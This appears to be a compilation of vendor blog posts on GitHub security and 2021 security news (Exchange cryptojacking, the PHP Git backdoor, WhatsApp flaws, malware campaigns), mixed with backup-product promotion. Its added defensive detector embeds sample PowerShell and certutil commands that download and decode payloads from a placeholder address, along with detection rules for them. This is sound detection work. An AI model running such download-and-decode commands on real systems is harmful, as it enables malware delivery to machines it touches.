
GitHub security – key basic security measures you should consider

GitHub, Bitbucket or GitLab? What to choose? For some businesses, especially those whose most valuable asset is code as intellectual property, the security of the code hosting and version control service may be the deciding factor. In this article we take a closer look at GitHub security.

GitHub security – breaches and failures

Since applications fuel our digital world and every company generates, processes and stores data, every business is now a technology company. At the same time, code and enterprise applications are a prime target for malicious actors, and a successful attack on them ends in devastating data breaches.

So how does GitHub security measure up? GitHub is considered a reliable and proven development platform, but as with any service, failures and outages happen to it from time to time. Security breaches are always big news in the community, and they leave you wondering whether your data is next in line to be compromised. Let's look at a few of the more recent incidents that hit Git or GitHub, on the user side or the service side.

In March 2021 the official PHP Git server was compromised and malicious commits were pushed into the project's code base: a software supply chain attack on everything built from that source.

In June 2020 there was a major outage of the GitHub service that lasted for hours and affected millions of developers.

In May 2019 a series of ransomware attacks targeted Git repositories on GitHub, Bitbucket and GitLab. Owners of the affected repositories were blackmailed: pay, or the code would be released to the public.

And the ransom itself may not be the biggest cost. Just imagine what attackers can do with your code and access to your intellectual property…

GitHub security measures

Now let’s take a closer look at how GitHub is trying to protect your intellectual property – below you can find some of the most important GitHub security tools and approaches. 

Empowering stronger authentication measures

Strong credentials are critical to keeping attackers out of your account. There are many common ways to get at an account, with phishing and other social-engineering techniques at the top of the list.

A strong password is an excellent starting point: use a long mix of lowercase and uppercase letters, digits and special characters, or several unrelated words. Set a strong, long and unique password for each and every website you have an account on. Strength counts for little if the same password is reused across sites, because once any one of them leaks its credentials that password is known and will be tried against your other accounts in future attacks (credential stuffing).

It is also hard to remember a different password for every site, which is why GitHub itself recommends using a password manager.

You have probably heard of HaveIBeenPwned.com, the project created by Troy Hunt that lets you check whether a password has appeared in a known breach (if not, we recommend trying it). Hunt made a corpus of over 500 million breached password hashes available for download, and GitHub made use of it: it built an internal version of the check, which tests whether a user's password has been found in any publicly reported and available breach dataset, so that a compromised password is not accepted.
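
The k-anonymity range check behind that kind of lookup, as an added example (our illustration, not GitHub's internal implementation or the Have I Been Pwned client): only the first five hex characters of the password's SHA-1 leave the client, the service returns every suffix in that range with its breach count, and the match is done locally, so the service never learns the password or its full hash. The range response embedded below is constructed, with illustrative counts, and only `fetch_range` talks to the real endpoint; nothing here calls it.

```python
import hashlib
import urllib.request
from typing import Optional, Tuple

# Real Pwned Passwords range endpoint; used only by fetch_range(), never called in the demo.
PWNED_RANGE_API = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the uppercase hex SHA-1 of the password into the 5-char prefix that is
    sent to the service and the 35-char suffix that never leaves the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def match_suffix(suffix: str, range_response: str) -> int:
    """Search a range response ("SUFFIX:COUNT" per line) for our suffix.
    Returns the breach count, or 0 if the password was not in the range."""
    for line in range_response.splitlines():
        line = line.strip()
        if not line:
            continue
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0


def fetch_range(prefix: str) -> str:
    """Live lookup: the service sees five hex characters, i.e. one of 16^5 buckets,
    and cannot tell which of the several hundred hashes in it we are interested in."""
    req = urllib.request.Request(PWNED_RANGE_API + prefix,
                                 headers={"User-Agent": "hibp-range-check-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, range_response: Optional[str] = None) -> int:
    """Number of breaches the password appeared in (0 = not found).
    Pass a pre-fetched range response to stay offline; otherwise the prefix is fetched live."""
    prefix, suffix = sha1_prefix_suffix(password)
    if range_response is None:
        range_response = fetch_range(prefix)
    return match_suffix(suffix, range_response)


# Constructed stand-in for the response to /range/5BAA6 (the prefix of SHA-1("password")).
# A real response holds several hundred suffixes; the counts here are illustrative only.
CONSTRUCTED_RANGE_5BAA6 = """\
1D2DA4053E34E76F6576ED1DA63134B5E2A:2
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
1E2CB19AF97D4F2C4EC6F5D6B3B1D1A3A6F:1
"""

if __name__ == "__main__":
    print("breach count for 'password':", breach_count("password", CONSTRUCTED_RANGE_5BAA6))
```

The check belongs at the point where a password is set or changed; a hit should block the password, not merely warn, and the comparison must be on the full 35-character suffix so that a neighbouring hash in the same bucket is not mistaken for a match.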

Two-Factor Authentication (2FA) 

Another recommended practice is to set up two-factor authentication (2FA) on your account. With 2FA it is not enough to enter the correct password; you must also provide a second means of authentication, such as an SMS code, a code from an authenticator app or an in-app confirmation on your phone. Even if your password has been compromised, an attacker will not get into your account without access to that second factor. But make sure you do not lose access to the second factor yourself, and keep the recovery codes GitHub gives you at enrolment somewhere safe, because losing both can make regaining access to your account dramatically harder after a disaster.

GitHub bug bounty

GitHub's security team runs a bug bounty program so that it finds vulnerabilities in its systems before threat actors do. The premise is to find as many vulnerabilities as possible, and to do that GitHub enlisted the whole internet: anyone who finds a vulnerability in GitHub can submit it through the program, and depending on the severity of the finding the rewards range from $617 to over $30,000. In this way GitHub security is greatly improved, largely through the actions of the community.

Xopero’s way to ensure GitHub security

Whether or not you think GitHub's own security is sufficient, it is a fact that when an attack hits your intellectual property, your company is in serious trouble. It does not matter whether a developer accidentally deletes a branch or a ransom attack targets your company: you need to be sure your data is recoverable and accessible, so that your employees can get back to work and there is no risk of business interruption. A proper backup of your repositories ensures you can recover your data from any point in time and get back to code immediately.

Protect your intellectual property with Xopero ONE Backup and Recovery for GitHub:

  • Predefined backup plans or advanced customization possibilities
  • Backup servers, repositories and metadata – both local and cloud
  • Backup with every push or according to schedule – just set it and forget it
  • Keep data on-premise or in the cloud – AWS, Azure, etc. – choose your storage
  • Manage it all with the most user-friendly console and data-driven interface
  • Instant, stress-free recovery – get back to code immediately
  • Advanced retention schemes – FIFO or GFS – choose yours
  • Unlimited scalability – simply add new repositories

and many more…

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create a more accessible and affordable secure data protection solution for any business. In 2015, Xopero started cooperating with QNAP Inc., one of the key global NAS providers, which expanded our portfolio to include a true backup appliance. In 2017, Xopero fully expanded into the global market thanks to cooperation with ESET, taking the place previously occupied by StorageCraft in the ESET Technological Alliance.

Beware! Two new WhatsApp bugs expose you to a man-in-the-middle attack

Android users have new reasons to worry… again. About a week ago we reported on the FlixOnline application, whose operators managed to slip past the Google Play Store's app vetting. This time we report two serious bugs in WhatsApp that enable a so-called man-in-the-disk attack: the attacker manipulates data that the application exchanges with external storage. Details below.

New WhatsApp bugs could’ve let attackers remotely hack your phone

Two security vulnerabilities have recently been spotted in WhatsApp for Android. They could have been exploited to execute malicious code remotely on the device and even exfiltrate sensitive information.

The flaws affect devices running Android 9 and earlier, via a man-in-the-disk attack: an adversary compromises an app by manipulating the data it exchanges with external storage, an area that any app with storage permission can read and write on these Android versions.

The flaw (CVE-2021-24027) leverages Chrome's support for Android content providers (the content:// URL scheme) together with a same-origin policy bypass in the browser (CVE-2020-6516), allowing an attacker to send a specially crafted HTML file to a victim over WhatsApp which, when opened in the browser, executes the code it contains.

All an attacker has to do is lure the victim into opening an HTML document attachment. WhatsApp renders the attachment in Chrome over a content provider, and the attacker's JavaScript is then able to steal the stored TLS session keys.

WhatsApp bugs – a means to an end

Armed with the keys, a bad actor can then stage a man-in-the-middle attack to achieve remote code execution or even exfiltrate the Noise protocol key pairs.

Worse, the malicious code can be used to access any resource stored in the unprotected external storage area and expose sensitive information to any app that’s provisioned to read or write from the external storage.

WhatsApp users are recommended to update to version 2.21.4.18 to mitigate the risk associated with the flaws.

Source

Hijacked Microsoft Exchange used to host cryptominer

Cryptojacking can be added to the list of threats facing unpatched Exchange servers that remain vulnerable to the ProxyLogon exploit. More than 92 percent of affected Microsoft Exchange servers have been patched, but the damage had already been done.

Researchers at Sophos report an unknown attacker is attempting to use a compromised Microsoft Exchange Server to deliver a malicious Monero cryptominer onto other vulnerable Microsoft Exchange Servers. Because the cryptominer is hosted on a compromised Exchange Server, it may be easier for the attacker to deliver the payload to other vulnerable targets as firewalls are less likely to block traffic between Exchange Servers.

Sophos detects the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA).

The ‘unusual attack’

The attack begins with a PowerShell command that retrieves a file named win_r.zip from another compromised server's Outlook Web Access logon path (/owa/auth). The .zip file is not a compressed archive at all but a batch script, which then invokes the Windows built-in certutil.exe to download two additional files, win_s.zip and win_d.zip, which are not compressed either.

The batch script then runs another command that writes the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and its configuration from the QuickCPU.dat file, injects the miner into a system process, and then deletes any evidence that it was there.
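
A detection over process-creation events for the chain described above, as an added example (ours, not Sophos's detection logic): it looks for PowerShell download cradles, for anything fetched from an /owa/auth/ path, and for certutil's -urlcache and -decode switches, the usual way the Windows built-in gets abused as a downloader and base64 decoder. The events are constructed for the example; 203.0.113.5 is a documentation address, the file names follow the write-up, and the rule set and rule names are our own.

```python
import re
from typing import List, Tuple

# Constructed process-creation events (image name, command line) modelled on the chain above.
# 203.0.113.5 is an RFC 5737 documentation address; the last two events are benign admin use.
CONSTRUCTED_EVENTS: List[Tuple[str, str]] = [
    ("powershell.exe",
     "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
     "'https://203.0.113.5/owa/auth/win_r.zip', 'C:\\Windows\\Temp\\win_r.zip')\""),
    ("certutil.exe",
     "certutil.exe -urlcache -split -f https://203.0.113.5/owa/auth/win_s.zip C:\\Windows\\Temp\\win_s.zip"),
    ("certutil.exe",
     "certutil.exe -decode C:\\Windows\\Temp\\win_d.zip C:\\Windows\\Temp\\win_d.exe"),
    ("certutil.exe",
     "certutil.exe -verify C:\\certs\\mail.example.org.cer"),
    ("powershell.exe",
     "powershell.exe -c Get-Service W3SVC"),
]

# (rule name, pattern). -urlcache and -decode are documented certutil options; the PowerShell
# alternatives are the common download cradles. Order matters only for the report.
RULES = [
    ("certutil used as a downloader",
     re.compile(r"\bcertutil(\.exe)?\b.*\s-urlcache\b", re.I)),
    ("certutil used to decode a payload",
     re.compile(r"\bcertutil(\.exe)?\b.*\s-decode(hex)?\b", re.I)),
    ("PowerShell download cradle",
     re.compile(r"\bpowershell(\.exe)?\b.*(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)", re.I)),
    ("fetch from an OWA auth path",
     re.compile(r"https?://[^\s'\"]+/owa/auth/", re.I)),
]


def scan(events: List[Tuple[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, names of the rules it matched) for every event that trips
    at least one rule. Events that match nothing are omitted."""
    findings: List[Tuple[int, List[str]]] = []
    for i, (_image, cmdline) in enumerate(events):
        hits = [name for name, rx in RULES if rx.search(cmdline)]
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(CONSTRUCTED_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Feed it the command lines from Sysmon event ID 1 or Windows Security event 4688 (with command-line auditing enabled). A single certutil download on an Exchange server is already worth a ticket; a download from another organisation's /owa/auth/ path followed by certutil -decode within minutes is the whole chain and should page someone.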

Source

SMASH, the newest Rowhammer attack, is a threat to your DDR4 memory

Rowhammer is an umbrella term for a class of exploits that abuse a hardware design quirk of DRAM, DDR4 included. SMASH is the newest variant: it triggers bit flips from JavaScript on current DDR4 modules despite the Target Row Refresh (TRR) mitigations manufacturers have been shipping for about five years.

How DRAM stores data

RAM modules store data in memory cells (each a capacitor and a transistor) arranged in a matrix of rows and columns. The cells leak charge over time, so each row must be periodically read and rewritten (refreshed) to restore the capacitors to their original level. Rowhammer abuses exactly this: rapidly and repeatedly activating (hammering) one row disturbs the charge in physically adjacent rows, and if that happens faster than refresh can restore them, bits in the neighbouring rows flip without ever being written.

To hell with old mitigations…

To bypass TRR, SMASH (Synchronized Many-Sided Hammering) carefully schedules cache hits and misses so that its many-sided hammering pattern stays in sync with the memory refresh, which is what defeats the mitigation. The resulting bit flips give threat actors an arbitrary read/write primitive in the browser:

The exploit chain is initiated when a victim visits a malicious website under the adversary’s control or a legitimate website that contains a malicious ad, taking advantage of the Rowhammer bit flips triggered from within the JavaScript sandbox to gain control over the victim’s browser.

Source

SolarMarker hackers flood the web with 100K sites offering malicious PDFs

Cybercriminals are resorting to search engine poisoning to lure business professionals onto seemingly legitimate Google Sites pages that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks.

The attack starts with searches for business forms such as invoices, templates, questionnaires and receipts, used as a stepping stone into the victim's systems. When the user tries to download the supposed document template, they are silently redirected to a malicious website that hosts the RAT.

According to eSentire researchers, once the RAT is active on the victim's computer, attackers can send commands and upload additional malware such as ransomware, a credential stealer or a banking trojan, or simply use the RAT, called SolarMarker (aka Yellow Cockatoo, Jupyter and Polazert), as a foothold into the victim's network.

The firm said it discovered over 100,000 unique web pages containing popular business terms or keywords such as template, invoice, questionnaire, resume and receipt. The even more troubling aspect of this campaign is that the SolarMarker group uses SEO techniques to push its malicious pages higher in search results, which increases the likelihood of success.

If you are looking for any financial documents templates, better use only official, well-known websites.

Source


FlixOnline – if you too have this app installed, delete it now

FlixOnline – this fake Netflix app is hijacking your WhatsApp sessions and stealing credit card data

The FlixOnline app lured users by promising free Netflix Premium subscriptions. Instead of two free months, users got mobile malware that hijacked their WhatsApp sessions to spread itself.

The Check Point Research team revealed that the malware can capture WhatsApp notifications and take several predefined actions, such as Dismiss or Reply through the Notification Manager.

Image credit: Checkpoint

After FlixOnline is installed on a device it asks for overlay permission, a common trick for stealing service credentials by drawing fake login screens over legitimate apps. It also asks to be excluded from battery optimization, so the system does not stop it to save power, and for notification access, which lets it read WhatsApp-related communications.

Attackers next step? Stealing Netflix credentials and payment data such as credit card number. The information is then transmitted to a Command and Control server. 

The real problem: safe and sound… and undetected 

The app was available in the Google Play Store for about two months and was downloaded nearly 500 times. That is modest; more successful and more damaging campaigns have certainly been launched in the last 12 months. The real problem lies elsewhere: the malware got through Google Play Store's app review, so in this case the store's built-in protection measures failed entirely.

Source

Looking for a job? Watch out for well-targeted job offers on LinkedIn – it's malware!

A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called “more_eggs.”

To increase the odds of success and the open rate, the malicious ZIP archives carry the same name as the victim's job title taken from their LinkedIn profile. For example, if the member's position is Account Manager, the malicious zip file is titled "Account Manager position" (note the word 'position' added to the end). Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs. Once loaded, the sophisticated backdoor can download additional malicious plugins and provide hands-on access to the victim's computer, said cybersecurity firm eSentire's Threat Response Unit in its analysis. Furthermore, it can act as a conduit to retrieve additional payloads from an attacker-controlled server, such as banking trojans, ransomware and credential stealers, and the backdoor can serve as a foothold in the victim's network from which to exfiltrate data.

The Trojan also abuses legitimate Windows processes such as WMI to evade detection by traditional AV tools.

Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdoor attributed to a malware-as-a-service (MaaS) provider called Golden Chickens. The adversaries behind this new wave of attacks remain unknown, although more_eggs has been put to use by various cybercrime groups such as FIN6, Cobalt, and EvilNum in the past.

The group is thought to be taking advantage of the high number of COVID-19 redundancies to spread this email campaign. 

Sources: 1 | 2

Discord and Slack full of malware – just one network search turned up 20,000 virus results!

Abuse of collaboration applications is not a new phenomenon. Changes to employee workflows caused by the COVID-19 pandemic have led to an increased reliance on communication platforms like Discord and Slack for conducting business. As predicted, threat actors have now moved in, abusing the platforms' legitimate functions to evade security controls and deliver info-stealers, remote-access trojans (RATs) and other malware.

Payloads observed include various RATs and stealers, such as Agent Tesla, AsyncRAT and Formbook.

Why did cybercriminals move to collaboration applications?

One of the key challenges in malware delivery is making sure the files, domains or systems involved do not get taken down or blocked. By moving to collaboration apps, attackers have greatly increased the likelihood that a malicious attachment reaches the end user. Slack, Discord and similar platforms use content delivery networks (CDNs) to store the files shared within channels. Take Slack as an example: files can be uploaded to Slack and users can create external links that allow the files to be accessed whether or not the recipient even has Slack installed. Once the file has evaded detection by security tooling, it is just a matter of getting the employee to believe it is genuine business communication, a task made easier within the confines of a collaboration app channel.

It also means attackers can deliver their malicious payload to the CDN over encrypted HTTPS, and that the files will be archived and compressed, further disguising the content. Over the past year Cisco's Talos Intelligence team, which conducted extensive research into this, observed many common archive formats in use, including .ACE, .GZ, .TAR and .ZIP, and several less common ones, like .LZH.

CDNs are also handy for delivering additional payloads in multi-stage infections. The researchers saw this behaviour across malware families, adding that a single search for the Discord CDN turned up almost 20,000 results in VirusTotal. The technique was frequently used in campaigns involving RATs, stealers and other malware typically used to retrieve sensitive information from infected systems.

Attackers turned the Discord API into an effective tool to exfiltrate data from the network. The C2 communications are enabled through webhooks, which were developed to send automated messages to a specific Discord server.

How to mitigate the risk?

Most organizations use a large number of communication tools. The most frequently used are email, collaboration and messaging platforms, web conferencing chats, and text messages on phones and tablets. In some cases users communicate with different, or sometimes the same, people across multiple platforms. It is tiring and lowers awareness of possible risk factors and attack vectors.

What do specialists recommend? Mark Kedgley, CTO at New Net Technologies, proposes focusing on least privilege, as it is still far too common for users to run with local admin rights. Many business solutions provide hardened settings to combat malware and phishing, but not enough organizations make use of them. On top of that we should put in place security controls such as change control and vulnerability management.

Source

EtterSilent maldoc builder mimics DocuSign and is used by top cybercriminal gangs

Hackers are using a malicious document builder named ‘EtterSilent’ to run their criminal schemes. As its popularity on underground forums increased, the developer kept improving it to avoid detection from security solutions.

Ads promoting EtterSilent maldoc builder have been published on underground forums, boasting features like bypassing Windows Defender, Windows AMSI (Antimalware Scan Interface), and popular email services, Gmail included. 

It comes in two versions, according to the Intel 471 research. One exploits a vulnerability in Microsoft Office, CVE-2017-8570, and one uses a malicious macro. 

One version of EtterSilent imitates the digital signature product DocuSign or DigiCert, though when targets click through to electronically sign documents, they are prompted to enable macros. This allows the attackers to target victims with malware.

Because it uses Excel 4.0 (XLM) macros, EtterSilent does not depend on the Visual Basic for Applications (VBA) language that is most commonly seen in malicious macros.

Last month EtterSilent was used in a campaign that leveraged another tool, called Bazar loader. In a previous campaign that used EtterSilent, attackers dropped an updated version of Trickbot, a banking trojan. Others, using banking trojans BokBot, Gozi ISFB and QBot have also used EtterSilent, Intel 471 notes.

Sources: 1 | 2


Monthly summary: Git Backup Guide / GitProtect beta tests

The first week of April is already behind us, so it is time to summarize the activities and special projects we prepared for you last month.

Check it out!

GIT Backup GUIDE: How to protect GitHub, Bitbucket, and GitLab

Code as Intellectual Property could be the most valuable asset within your business – you need to be sure it’s properly protected. As CTO, IT manager, software-house owner, or team leader – you probably can imagine how much it would cost you to lose the code your team has been working on for months…

How to protect your GitHub, Bitbucket, or GitLab repositories, servers, and metadata? Do you need a third-party backup solution? Is it even possible that an outage or any event of failure would ever happen to companies like GitHub or Atlassian? What should the Git backup strategy include? All the answers as well as recommendations for solutions empowering your security and productivity in GitHub and Bitbucket you will find in our brand new guide – “GIT Backup Guide: How to protect GitHub, Bitbucket and GitLab data”. 

Free download

GitProtect – GitHub and Bitbucket Backup – Join BETA TESTS

Join Beta Tests of GitProtect – #1 professional, manageable backup solution for GitHub, and Bitbucket. If your organization uses version control systems, you probably are aware that code as intellectual property is the most valuable asset inside your company – you and your team spent thousands of hours (and money) to write, support and improve projects. Make sure it’s recoverable and accessible. Join beta tests now and get access to extended trial, exclusive offers, special discounts, and much more. 

Try out our key features – very soon:

  • Backup GitHub and Bitbucket servers, repositories and metadata – local & cloud
  • Set it and forget it – backup code with every push or according to schedule
  • New repo? It will be automatically added to your backup plan (predefined or customized)
  • Keep data on-premise or in the cloud – choose your storage
  • Restore anywhere you need – to a repository or a local device
  • Stay up to date with backup verification, advanced reporting, notifications, audit logs 
  • The #1 most user-friendly console and data-driven interface on the market.

Code peacefully – we’ve got your back(up).

Join Beta Tests

Xopero cited in major IT media

Last month insights and results of our survey on cybersecurity have been widely commented on in the most popular tech magazines and media again. We have been invited to local magazines, radio and podcasts.

Many issues in the area of security are treated marginally or even downplayed. A perfect example is employee training, which usually applies only to IT departments. This is a serious mistake. After all, today almost everyone uses a computer to work, not always knowing what threats they may face. I believe that the lack of proper training is reflected directly in the most common vector of ransomware infection, which is email phishing. Phishing, in turn, is nothing more than malicious email messages, in which criminals often impersonate a known entity or act on our emotions and induce us to take specific actions – download an attachment or click malicious links – comments Grzegorz Bąk, our Product Development Manager, exclusively for Brief – a leading Polish business and technology portal.

We are very delighted that cybersecurity is becoming a more relevant subject of social discussions, and Xopero can contribute to shaping public opinion and educating businesses about data protection. 


Bugs in VMware vRealize Operations platform make RCE and admin’s credentials theft possible

Welcome to the next episode of the Xopero Security Center. Stealing admin credentials, or gaining access to a platform that manages IT operations across various cloud deployments and lets admins monitor the health and capacity of virtual environments, is a serious security breach. And these dark scenarios become more than possible thanks to two newly discovered [and patched] vulnerabilities in the VMware vRealize Operations platform. How severe is the new threat? To find out, read the whole post below.

VMware with two severe vulnerabilities in the vRealize Operations platform – they could lead to RCE and theft of admin credentials

VMware has published security updates to address high severity vulnerabilities which impact vRealize Operations, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Unpatched, they could allow attackers to steal admin credentials after exploiting vulnerable servers.

The first vulnerability – tracked as CVE-2021-21975 – was found in the vRealize Operations Manager API. This is a server-side request forgery (SSRF) bug with a CVSS score of 8.6 out of 10. It permits threat actors with network access to perform SSRF attacks and steal administrator credentials.

The second bug, tracked as CVE-2021-21983 with a CVSS score of 7.2, was also discovered in the vRealize Operations Manager API. It requires the attacker to be authenticated and to have network access (and the first vulnerability can provide just that). Once those conditions are met, the bug lets attackers write files to arbitrary locations on the underlying Photon OS.

What is at stake?

– Pre-auth remote code execution and theft of admin credentials. Attackers can exploit the SSRF remotely, without authentication or user interaction and with low attack complexity, to steal administrative credentials. Patches are available, and VMware has also published workaround instructions for admins who cannot or do not want to patch immediately, or whose version has no patch yet. Details are in the vendor's Knowledge Base.

Source

PHP’s Git server hacked to add backdoors to source code and obtain RCE

The official PHP Git server has been compromised in a potential attempt to implant malware in the PHP project’s code base. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server.

These commits were signed off as if they were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov and masked as simple typographical errors that needed to be resolved.

However, the added line 370, which calls the zend_eval_string function, actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on any website running this hijacked version of PHP.

Popov said the development team is not sure exactly how the attack took place. The clues indicate that the official git.php.net server was likely compromised, rather than individual Git accounts.

Additionally, the malicious commit was made in the name of PHP creator Rasmus Lerdorf. That is hardly surprising: with source code version control systems like Git, it is possible to sign off a commit locally as coming from anybody else and then upload the spoofed commit to the remote Git server, where it gives the impression that it had indeed been signed off by the person named on it.

Luckily, the commits were detected and reverted before they made it downstream or impacted users. However, the incident is alarming considering PHP remains the server-side programming language to power over 79% of the websites on the Internet.

An investigation into the security incident is now underway. The development team has also decided to move permanently to GitHub.
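The point above is that the author and committer fields of a Git commit are plain text that anyone can set; only a cryptographic signature ties a commit to a person. The following is an added example (not code from the PHP project or from this article) of the defender-side check: it reads the signature status that `git log` reports through its `%G?` placeholder and lists every commit that is not signed by a trusted key. The sample log output, hashes and maintainer names are constructed placeholders.

```python
"""List commits whose signature status does not meet policy.

Added example, not the PHP project's code. Git's `%G?` placeholder reports
signature verification status per commit (values documented in git-log):
  G good signature        B bad signature       U good but untrusted key
  X good but expired      Y key expired         R key revoked
  E cannot be checked (e.g. missing key)        N no signature
Only 'G' is accepted here; everything else is reported.
"""
import subprocess
from typing import List, Tuple

ACCEPTABLE_STATUS = {"G"}

# hash <TAB> author name <TAB> signature status  (%x09 is a tab)
LOG_FORMAT = "%H%x09%an%x09%G?"


def git_log_signatures(repo_path: str, rev_range: str = "HEAD") -> str:
    """Run git log in `repo_path` and return its raw output (needs git and gpg installed)."""
    proc = subprocess.run(
        ["git", "-C", repo_path, "log", f"--format={LOG_FORMAT}", rev_range],
        check=True, capture_output=True, text=True,
    )
    return proc.stdout


def flag_unverified(log_output: str) -> List[Tuple[str, str, str]]:
    """Return (hash, claimed author, status) for each commit whose status is not acceptable.

    Works on the text produced by `git_log_signatures`, so it can also be run on
    log output captured on a CI server.
    """
    flagged = []
    for line in log_output.splitlines():
        if not line.strip():
            continue
        commit, author, status = line.split("\t", 2)
        if status.strip() not in ACCEPTABLE_STATUS:
            flagged.append((commit, author, status.strip()))
    return flagged


# Constructed sample output: hashes and names are placeholders, not real commits.
SAMPLE_LOG = (
    "aaaa0001\tMaintainer A\tG\n"   # signed with a trusted key: fine
    "aaaa0002\tMaintainer B\tN\n"   # no signature, although the author field names B
    "aaaa0003\tMaintainer A\tE\n"   # signed, but the key is not available to verify
    "aaaa0004\tMaintainer C\tU\n"   # good signature, but the key is not trusted
)

if __name__ == "__main__":
    # On a real repository: flag_unverified(git_log_signatures("/path/to/repo", "origin/main..HEAD"))
    for commit, author, status in flag_unverified(SAMPLE_LOG):
        print(f"{commit}: author field says '{author}' but signature status is {status}")
```

Run against a range such as `origin/main..HEAD` before merging, so a commit that merely claims to come from a maintainer is caught regardless of what the name fields say.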

Sources: 1 | 2

Two new Linux vulnerabilities could let attackers extract sensitive information from kernel memory

Two new vulnerabilities – tracked as CVE-2020-27170 and CVE-2020-27171 – impact all Linux kernels prior to 5.11.8. If successfully exploited, they could let attackers circumvent mitigations for speculative-execution attacks such as Spectre and obtain sensitive information from kernel memory.

While CVE-2020-27170 can be abused to reveal content from any location within the kernel memory, CVE-2020-27171 can be used to retrieve data from a 4GB range of kernel memory.

The new vulnerabilities, uncovered by Piotr Krysiuk of Symantec’s Threat Hunter team, get around the kernel’s Spectre/Meltdown mitigations by taking advantage of its support for extended Berkeley Packet Filters (eBPF) to extract the contents of kernel memory. Specifically, the kernel’s eBPF verifier (“kernel/bpf/verifier.c”) was found to perform undesirable out-of-bounds speculation on pointer arithmetic, thus defeating fixes for Spectre and opening the door for side-channel attacks.

Unprivileged users could leverage these weaknesses to gain access to secrets from other users sharing the same vulnerable machine. If attackers first obtain a foothold on an exploitable machine – for example by getting malware onto it to achieve remote access – this could also allow them to gain access to all user profiles on the machine.

Official patches are available from March 20th. Ubuntu, Debian, and Red Hat deployed fixes in their respective Linux distributions as well.

Source

Docker Hub images downloaded 20M times spread cryptominers

At least 30 malicious publicly available images in Docker Hub, with a collective 20 million downloads, have been used to spread cryptomining malware. It is estimated that this trick brought authors around $200,000. 

Docker Hub is the largest library of container applications, allowing companies to share images internally or with their customers, or the developer community to distribute open-source projects.

Aviv Sasson, a researcher with Palo Alto Networks’ Unit 42, found that they came from 10 different accounts. Some of them have names that clearly indicate their purpose, while others have misleading names like “proxy”, “ggcloud” or “docker”. Some of them are still available on Docker Hub at the time of writing.

In 90.3% of cases, the attackers’ operation mined for Monero cryptocurrency, XMRig being the favorite tool for the purpose. However, some operations sought Grin (GRIN) or ARO (Aronium) cryptocurrency.

Sasson found that the adversaries behind the malicious images have applied tags to them, which are a way to reference different versions of the same image. He theorized that the tags are used to match up the appropriate version of the malware depending on the processor architecture or operating system on which they are downloaded. A common element for all the tags in an image is the wallet address or the mining pool credentials…

It’s very possible that those images are merely the tip of the iceberg, given that the cloud presents big opportunities for cryptojacking attacks.

Sources: 1 | 2

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which includes Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create a more accessible and affordable secure data protection solution for any business. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance. In 2017, Xopero fully extended into the global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Bitbucket security – best practices

For some businesses, especially those for which code is the most critical resource, the security of the code hosting and version control service might be a key decision factor. There are three main such services on the market – GitHub, Bitbucket, GitLab. In this article, we will take a closer look at Bitbucket security.


Bitbucket security – failures and breaches

Nowadays, applications and software fuel the digital world. Every company generates, stores or processes data – nearly every business is a technology company now. And with that in mind, with every accumulating bit of information, more and more businesses, software or code become a perfect target for malicious attacks, which can result in devastating data breaches.

So what means does Bitbucket use to secure business data? Bitbucket as a service is part of Atlassian, and as a company they are quite transparent when it comes to their systems and their interaction with customers and users of their services, which of course includes security issues.

Overall their security is considered reliable, but as with any internet service, outages or failures occur to Git itself or to Bitbucket. Even if not to the entire company – a specific company’s Bitbucket account might be attacked and compromised. Still can’t believe it? Let’s mention just a few situations.

In March of 2021 the official PHP Git repository was hacked and the code base tampered with due to the software supply chain attack. 

In May of 2019 IT services reported that attackers were targeting Bitbucket, GitHub and GitLab users, wiping code and commits from multiple repositories and leaving behind only a mysterious ransom note and a lot of questions.

It’s worth mentioning that ransom itself is just a small part of the entire ransomware damage cost. What are other ingredients? Cost of damaged/stolen data, downtime costs, lost productivity, post-attack disruption to the normal course of business, forensic investigation, employee training, loss of reputation and direct response to the ransomware attacks. 

Just imagine what would happen if hackers gained access to your intellectual property – your company’s code.

Bitbucket security measures

Let’s now take a look at how Atlassian and specifically – BitBucket – is trying to protect your repositories on their site. Below you will find some of the most important Bitbucket security measures.

